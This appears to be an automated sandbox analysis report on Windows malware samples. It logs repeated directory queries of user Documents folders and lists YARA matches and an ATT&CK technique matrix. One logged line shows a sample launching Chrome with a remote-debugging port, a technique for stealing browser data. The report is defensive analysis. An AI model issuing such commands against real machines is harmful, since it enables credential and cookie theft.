                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: number of queries: 1001
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: number of queries: 2002
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: number of queries: 1001
                              Source: Yara matchFile source: 00000018.00000003.3232038991.0000000000938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.2841686209.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001E.00000003.3529309223.000000000177D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001E.00000003.3526536288.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.2795246224.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001E.00000003.3595404950.000000000177D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000018.00000003.3235297402.0000000000938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001E.00000003.3445606549.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.2814280047.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000018.00000003.3358350057.0000000000938000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.2797362552.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001E.00000003.3445606549.000000000177D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 85746525a0.exe PID: 7908, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: bb31c9d4a53941b6b913f33980d23feb.exe PID: 2792, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ed7d415177.exe PID: 944, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: d0e32932f8.exe PID: 6672, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ed7d415177.exe PID: 280, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              Source: Yara matchFile source: Process Memory Space: bc893816fa.exe PID: 3400, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 85746525a0.exe PID: 7908, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ed7d415177.exe PID: 944, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ed7d415177.exe PID: 280, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: 0000001A.00000003.3064139165.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000002.3668631588.000000000071E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.3214718315.0000000005640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: d0e32932f8.exe PID: 6672, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: d0e32932f8.exe PID: 7728, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 21.0.bb31c9d4a53941b6b913f33980d23feb.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 81d22383f9.exe PID: 7712, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: bb31c9d4a53941b6b913f33980d23feb.exe PID: 2792, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: d0e32932f8.exe PID: 6672, type: MEMORYSTR
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting
                              Valid Accounts21
                              Windows Management Instrumentation
                              1
                              Scripting
                              1
                              DLL Side-Loading
                              511
                              Disable or Modify Tools
                              2
                              OS Credential Dumping
                              1
                              System Time Discovery
                              Remote Services11
                              Archive Collected Data
                              14
                              Ingress Tool Transfer
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Native API
                              1
                              DLL Side-Loading
                              2
                              Bypass User Account Control
                              11
                              Deobfuscate/Decode Files or Information
                              1
                              Credentials in Registry
                              23
                              File and Directory Discovery
                              Remote Desktop Protocol41
                              Data from Local System
                              11
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts3
                              Command and Scripting Interpreter
                              1
                              Scheduled Task/Job
                              1
                              Extra Window Memory Injection
                              3
                              Obfuscated Files or Information
                              Security Account Manager258
                              System Information Discovery
                              SMB/Windows Admin Shares1
                              Email Collection
                              1
                              Remote Access Software
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts1
                              Scheduled Task/Job
                              11
                              Registry Run Keys / Startup Folder
                              212
                              Process Injection
                              12
                              Software Packing
                              NTDS1
                              Query Registry
                              Distributed Component Object ModelInput Capture4
                              Non-Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud Accounts1
                              PowerShell
                              Network Logon Script1
                              Scheduled Task/Job
                              1
                              Timestomp
                              LSA Secrets991
                              Security Software Discovery
                              SSHKeylogging115
                              Application Layer Protocol
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                              Registry Run Keys / Startup Folder
                              1
                              DLL Side-Loading
                              Cached Domain Credentials13
                              Process Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                              Bypass User Account Control
                              DCSync381
                              Virtualization/Sandbox Evasion
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              Extra Window Memory Injection
                              Proc Filesystem1
                              Application Window Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                              Masquerading
                              /etc/passwd and /etc/shadow1
                              Remote System Discovery
